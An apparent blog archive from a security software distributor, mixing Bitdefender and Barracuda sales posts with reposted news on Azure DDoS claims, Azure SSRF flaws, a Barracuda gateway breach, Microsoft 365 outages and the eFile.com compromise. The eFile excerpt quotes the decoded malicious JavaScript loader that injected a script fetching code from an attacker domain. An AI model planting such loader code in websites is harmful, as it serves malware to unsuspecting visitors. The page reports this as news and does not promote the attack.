Archives

Bitdefender Gravity Zone Mobile Device Manager is now ready to Activate

I finally met with the Project Manager today, to go over security

If you are a partner of MspPortal Partners Inc I can activate the account and now support it, Bitdefender has no tech support available yet.

We starting playing with the project over 2 weeks ago when it was released..Great Product..Pricing is stellar a must have for your clients

Contact the office for activation

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Microsoft’s Azure portal down following new claims of DDoS attacks

By Lawrence Abrams June 9, 2023 11:52 AM

Update at 6/9/23 1:33 PM ET added below

The Microsoft Azure Portal is down on the web as a threat actor known as Anonymous Suda claims to be targeting the site with a DDoS attack.

Attempting to access the portal at https://portal.azure.com displays an error message stating, “Our services aren’t available right now. We’re working to restore all services as soon as possible. Please check back soon.” The mobile app appears unaffected at this time.

“Azure Portal – Errors accessing the Azure Portal – Applying Mitigation

Impact Statement: Starting at approximately 15:00 UTC on 9 Jun 2023, Azure customers may experience error notifications when trying to access the Azure Portal (portal.azure.com).

Current Status: We have determined a potential root cause and are actively engaged in different workstreams applying load balancing processes in order to mitigate the issue. The next update will be provided within 60 minutes or as events warrant.

This message was last updated at 16:35 UTC on 09 June 2023″

At the same time, a threat actor known as Anonymous Sudan claims to be conducting a DDoS attack against the Microsoft Azure portal, sharing an image of the page not working.

Regardless of the threat actor’s origins, this has not been a good week for Microsoft, with the threat actor conducting DDoS attacks on other Microsoft web portals for Outlook.com and OneDrive, which also suffered outages at the same time.

Link (https://www.bleepingcomputer.com/news/microsoft/microsofts-azure-portal-down-following-new-claims-of-ddos-attacks/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Bitdefender Web Categories in GravityZone Content Control

This next KB describes the section Web Categories in GravityZone Content Control:
GravityZone: Security: Network Protection: Operation: Web Categories in GravityZone Content Control
Read Link

(https://www.bitdefender.com/business/support/en/77209-79818-operation.html#UUID-261aadd6-5c24-73b5-d8be-ccc2bf1be88a)

Roy Miehe | MspPortal Partners Inc. | Ceo/President

Security Software Distributor: Bitdefender , Barracuda, Axcient

“Where Service and Technical Skills Count”

Bitdefender releases MDM protection finally Gravity Zone Portal

Security for Mobile is a cloud-only mobile security solution able to protect mobile devices with Android or iOS operating systems against multiple threat vectors.

  • Features:
  • Advanced malware detection – safeguards mobile devices from a broad variety of threats by offering comprehensive malware detection capabilities.
  • Phishing protection – analyses incoming messages and detects any malicious links or content that could be used to acquire sensitive data or credentials.
  • Network security – offers an extensive set of tools for protecting mobile devices against a variety of network-based hazards. It helps assure the security and integrity of mobile devices in the current threat landscape by monitoring network traffic, providing secure connectivity, and detecting and preventing attacks.·
  • Compliance and policy enforcement – assist organizations in protecting their mobile devices from a variety of threats and ensuring that they are used securely and compliantly by making sure that all applications are properly vetted.
  • Mobile threat intelligence – provides users the real-time security and analytics they need to protect their mobile devices from a variety of threats.
  • Integration with mobile device management (MDM) solutions – enhances mobile security features. Because of the integration, enterprises may install the mobile threat defense solution using their existing MDM infrastructure. The integration also enables mobile device security policies to be enforced automatically.
  • Web content filtering – warns and prevent users from accessing potentially harmful websites and links, such as malware, phishing, botnets, and suspicious domains, or websites that violate your organization’s standards.
  • Are you an ISP, MSP, VAR or reseller?
  • All MspPortal Partners currently can be provisioned upon request, pricing is very aggressive tier pricing available no contract, just monthly usage.
  • Contact Us

Roy Miehe | MspPortal Partners Inc. | Ceo/President

Security Software Distributor: Bitdefender , Barracuda, Axcient

“Where Service and Technical Skills Count”

Barracuda identified a vulnerability (CVE pending) in our Email Security Gateway appliance (ESG) on May 19, 2023.

Investigating – Barracuda identified a vulnerability (CVE pending) in our Email Security Gateway appliance (ESG) on May 19, 2023. A security patch to eliminate the vulnerability was applied to all ESG appliances worldwide on Saturday, May 20, 2023. The vulnerability existed in a module which initially screens the attachments of incoming emails. No other Barracuda products, including our SaaS email security services, were subject to this vulnerability.

We took immediate steps to investigate this vulnerability. Based on our investigation to date, we’ve identified that the vulnerability resulted in unauthorized access to a subset of email gateway appliances. As part of our containment strategy, all ESG appliances have received a second patch on May 21, 2023. Users whose appliances we believe were impacted have been notified via the ESG user interface of actions to take. Barracuda has also reached out to these specific customers.

We will continue actively monitoring of this situation, and we will be transparent in sharing details on what actions we are taking. Information gathering is ongoing as part of the investigation. We want to ensure we only share validated information with actionable steps for you to take. As we have information to share, we will provide updates via this product status page (https://status.barracuda.com) and direct outreach to impacted customers. Updates are also located on Barracuda’s Trust Center (https://www.barracuda.com/company/legal).

Barracuda’s investigation was limited to the ESG product, and not the customer’s specific environment. Therefore, impacted customers should review their environments and determine any additional actions they want to take.

Your trust is important to us. We thank you for your understanding and support as we work through this issue and sincerely apologize for any inconvenience it may cause. If you have any questions, please reach out to support@barracuda.com.
May 23, 2023 – 20:28 UTC

Roy
If you need assistance let me know 9 years with Barracuda

Do You Need To Step Up Zero Trust Strategy?

Folks if you are reading this you have to lock down your security products
Quick Outline please do not be lazy and take to heed my comments. Most companies I have seen lately are calling your clients, As I have instructed my own MSP’s/Resellers make up these accounts in the DB, you own them they do not.. but legally if you provide that information to them you grant them access

See 6 new breaches below

RMM

RMM programs are hurting and trying to entice you into one window pane of glass RMM is nothing more the remote management with some reports as to the health of a machine/device that is it even there Remote tools are 3rd party API’s or hooks remote tools should only be Point to Point from a dashboard to the endpoint. The best program is Barracuda ( over 50% or more off SRP through MspPortal Partners Inc) no security breaches like Kaseya and Enable(formally Solarwinds, GFI, LogicNow, Houndog). Kaseya is on a spend Spree and is acquiring firms to add to there portfolio’s churn and burn at your expense. Read the EULA’s all they have to do is apologize and not compensate you a dime for your time to fix.

Every Security company out there has escape clauses WRONG. QUIT Signing contracts We do 3rd line support ourselves.

Mail-Filtering and Backups of O365

O365 is a joke. If you let your client sway you and setup O365 for them you have better protect yourself and your clients.
Barracuda has 3 mail programs Essentials, Complete Mail Protection, Total Mail Protection, MspPortal Partners Inc is a major player Barracuda Arena we offer almost 50% off of SRP if you were to buy direct thru Barracuda that is if a Salesperson contacts you back. We do 3rd line support ourselves.

Malware Detection/Antivirus

Bitdefender is the only product rated # 1. All other firms do extensive marketing with pretty pictures. This is truly a tech dashboard you control the client and the actions. Bitdefender claims (per article they wrote) that MspPortal Partners Inc is there largest provider to MSP’s. We do 3rd line support ourselves.

Hosted Mail
Last we are a partner with ZOHO. We have worked for over 4 months with them fixing there bugs to make it a competitor to O365..Downfall no US support they are based out of India. You need somebody like MspPortal to support you.

If you need pricing contact us, no contracts only month to month we believe if we are doing our job you stay if not you leave no grief. All we expect is you pay your invoices once a month.

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, RackSpace, Axcient
“Where Service and Technical Skills Count”
Phone: 480-275-6900
tech@mspportal.net

Related Articles Breachs:

Food distribution giant Sysco warns of data breach after cyberattack

Cold storage giant Americold outage caused by network breach

Dole discloses employee data breach after ransomware attack

Western Digital says hackers stole customer data in March cyberattack

Hackers leak images to taunt Western Digital’s cyberattack response

T-Mobile discloses second data breach since the start of 2023

Microsoft Patches Serious Azure Cloud Security Flaws

By Elizabeth Montalbano
Three vulnerabilities in the platform’s API Management Service could allow access sensitive data, mount further attacks, and even hijack developer portals.

Microsoft has patched three vulnerabilities in its Azure cloud platform that could have allowed attackers to access sensitive info on a targeted service, deny access to the server, or scan the internal network to mount further attacks, researchers have found.

Researchers from the Ermetic Research Team discovered the flaws in the Azure API Management Service, which allows organizations to create, manage, secure, and monitor APIs across all of their environments, they revealed in a blog post published May 4.

The flaws — all rated high-risk — include two Server-Side Request Forgery (SSRF) vulnerabilities and a file upload path traversal on an internal Azure workload.

SSRF allows an attacker to send a crafted request from a vulnerable server to a targeted external or internal server or service, or even target it in a denial-of-service (DoS) attack. Abusing these flaws means an attacker can access sensitive data stored on the targeted server, overload targeted servers using DoS attacks, and scan the internal network and identify potential targets for further attacks.

The third flaw is one in which Azure does not validate the file type and path of uploaded files. Typically in the case of this type of flaw, authenticated users can traverse the path specified to upload malicious files to the developer portal server and possibly execute code on it using DLL hijacking, IISNode config swapping, or any other similar attack vectors, the researchers said.

Microsoft responded quickly to Ermetic’s disclosure of the flaws and has fully patched them, according to the researchers, and no further action is necessary for Azure customers.
Details on the Bugs

Specifically, the Ermetic researchers discovered two separate SSRF flaws: one that affected the Azure API Management CORS Proxy and another that affected the Azure API Management Hosting Proxy.

They discovered the former on Dec. 21, 2022, and at first believed it was the same flaw that was first reported to Microsoft by another cloud security company on Nov. 12, and fixed a few days later on Nov. 16. However, the researchers later realized that the flaw they found actually bypasses that initial fix. Microsoft ultimately patched the vulnerability fully in January, the initial researchers reported later, according to Ermetic.

Together, the Azure SSRF flaws that researchers discovered affected central servers that “masses of users and organizations depend on for day-to-day operations,” says Liv Matan, cloud security researcher at Ermetic.

“Using them, attackers could fake requests from these legitimate servers, access internal services that may contain sensitive information belonging to Azure customers, and even prevent the availability of the vulnerable servers,” he says.

The path-traversal flaw found in Azure API Management Service allowed for an unrestricted file upload to the Azure developer portal server, the researchers said. The developer portal’s authenticated mode allowed someone to upload static files and images that would be shown on a developer’s dedicated portal, they said.

The flaw could have allowed attackers to take advantage of Microsoft’s self-hosted developer portal as well as weaponize the vulnerability against end users, Matan explains.

“Additionally, the Azure-hosted developer portal contains customer information that would have been at risk if the vulnerability had fallen into the wrong hands,” he says.
How to Protect the Enterprise

While API flaws like the ones Ermetic researchers discovered are uncommon, awareness of these types of vulnerabilities has grown in the past few years, Matan says.

Moreover, “blind SSRFs” — SSRF flaws that do not necessarily return any data but rather focus on performing unauthorized actions on the server’s backend — are fairly common, especially in cloud platforms that offer a wide range of services, he says.

Microsoft already had previously patched four SSRF flaws in four separate services of its Azure cloud platform, two of which could have allowed attackers to perform a server-side request forgery (SSRF) attack — and thus potentially execute remote code execution — even without authentication to a legitimate account.

“In the end, vulnerabilities can be discovered in any cloud platform, at any time,” Matan says.

There’s certainly been evidence of this, as — aside from SSRF flaws — researchers already have found a number of other flaws in Azure as well as other cloud platforms that could have threatened enterprise environments.

In one instance, Microsoft patched what researchers called a “dangerous” flaw in its Azure Service Fabric component that, if exploited, would have allowed an unauthenticated, malicious actor to execute code on a container hosted on the platform.

Because it’s difficult for an enterprise deploying a cloud to have control over or even be aware of a flaw on the underlying cloud-hosting infrastructure, it’s important for organizations to be vigilant in their own security practices so they are prepared if a flaw is eventually discovered or exploited, the researchers said.

In the case of avoiding compromising in the recently discovered Azure API Management, Matan recommends that organizations should practice proper input-validation hygiene and configure their servers to not follow redirects.

“To avoid a compromise in these cases, organizations should validate all input received from untrusted sources, such as user inputs or HTTP requests,” he says.

Other steps organizations can take to avoid compromise in these cases, Matan adds, include using a whitelist approach, implementing a strong firewall to restrict outgoing traffic from the application to only necessary services and ports, isolating data, and managing permissions on the server in cloud environments using IMDSv2.

Link (https://www.darkreading.com/cloud/microsoft-patches-serious-azure-cloud-security-flaws?_mc=NL_DR_EDT_DR_weekly_20230504&cid=NL_DR_EDT_DR_weekly_20230504&sp_aid=116363&elq_cid=34964379&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_cid=48484)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Microsoft 365 outage blocks access to web apps and services

By Sergiu Gatlan April 20, 2023 10:24 AM

My Comments:
Why do you folks put up with Microsoft?? If you want to safe guard your clients information at least use MspPortal/Barracuda product called Total Mail Protection, save it off the Microsoft Network wholesale pricing is very inexpensive but call for pricing

Microsoft is investigating an ongoing outage blocking customers worldwide from accessing and using web apps like Excel Online and online services.

The list of affected services includes Microsoft 365 suite, Exchange Online, SharePoint Online, Yammer Enterprise, Planner, Microsoft Teams, Microsoft 365 for the web, and Project for the web.

According to reports, customers are experiencing problems when trying to sign into their accounts and will see that no web apps are available once in.

“We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center,” the company tweeted earlier today.

“Users may be intermittently unable to view or access web apps in Microsoft 365. We’re reviewing service monitoring telemetry to isolate the root cause and develop a remediation plan,” the admin center incident report says.

In some cases, a banner displayed at the top of the screen asks “new” users to reach out to their IT department to help with the issue.

“New to Microsoft 365? This is your Microsoft 365 home page where you can see and access all of your apps. If it’s empty, it could be that your user license was very recently assigned to you,” the notification reads.

“Wait 10 minutes and refresh this page. If you still don’t see any apps, contact your IT department. They can help you get up and running.”

We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

According to the latest updates provided by Microsoft in the admin center, the out was caused by caching infrastructure performing below acceptable performance thresholds and leading to timeout exceptions.

“Analysis of diagnostic data has identified an unusually high number of timeout exceptions within our caching and Azure Active Directory (AAD) infrastructure. We’re working to isolate the cause of these exceptions whilst identifying steps to remediate impact,” Microsoft said.

Until this Microsoft 365 outage is addressed, users can access applications through direct URLs. Microsoft provides the following examples:

Microsoft 365 Admin Center – admin.microsoft.com
Outlook – outlook.office.com
Microsoft Teams – teams.microsoft.com
Word Online – microsoft365.com/launch/word
Excel Online – microsoft365.com/launch/excel

Another outage took down multiple Microsoft 365 services in January after a router IP address change caused packet forwarding issues between routers in Microsoft’s Wide Area Network (WAN).

Services affected by the January 2023 outage included Microsoft Teams, Exchange Online, Outlook, SharePoint Online, OneDrive, the Microsoft 365 Admin Center, Microsoft Graph, Microsoft Intune, and several Microsoft Defender products.

Update April 20, 13:23 EDT: Microsoft is investigating high CPU usage impacting infrastructure processing back-end navigation feature APIs.

Until the outage is resolved, customers can access the Microsoft 365 admin center via http://admin.microsoft.com.

We’re investigating high CPU utilization on the components which process back-end navigation feature APIs. Further details are under MO544165 in the admin center. As the admin center currently does not appear within the Waffle, use https://t.co/EdTvCQNMih to access the service.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

Link (https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-blocks-access-to-web-apps-and-services/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

 

IRS-authorized eFile.com tax return software caught serving JS malware

By Ax Sharma April 4, 2023 05:00 AM

If it was not already bad enough with the Banking issues going on

eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.

Security researchers state the malicious JavaScript file existed on eFile.com website for weeks. BleepingComputer has been able to confirm the existence of the malicious JavaScript file in question, at the time.

Note, this security incident specifically concerns eFile.com and not IRS’ e-file infrastructure or identical sounding domains.
Just in time for tax season

eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called ‘popper.js’:
eFile.com serving malicious popper.js file
The ‘popper.js’ file used by eFile.com across its webpages contains malware
​​​(BleepingComputer)

The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.

The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by infoamanewonliag[.]online:
s=document.createElement(‘script’);
document.body.appendChild(s);
s.src=’//www.infoamanewonliag[.]online/update/index.php?’+Math.random();

The use of Math.random() at the end is likely to prevent caching and load a fresh copy of the malware—should the threat actor make any changes to it, every time eFile.com is visited. At the time of writing, the endpoint was no longer up.

BleepingComputer can confirm, the malicious JavaScript file ‘popper.js’ was being loaded by almost every page of eFile.com, at least up until April 1st.
eFile.com pages serving popper.js
eFile.com pages serving poppers.js (BleepingComputer)

As of today, the file is no longer seen serving the malicious code.
Website ‘hijacked’ over 2 weeks ago

On March 17th, a Reddit thread surfaced where multiple eFile.com users suspected the website was “hijacked.”

At the time, the website showed an SSL error message that, some suspected, was fake and indicative of a hack:

Article (https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”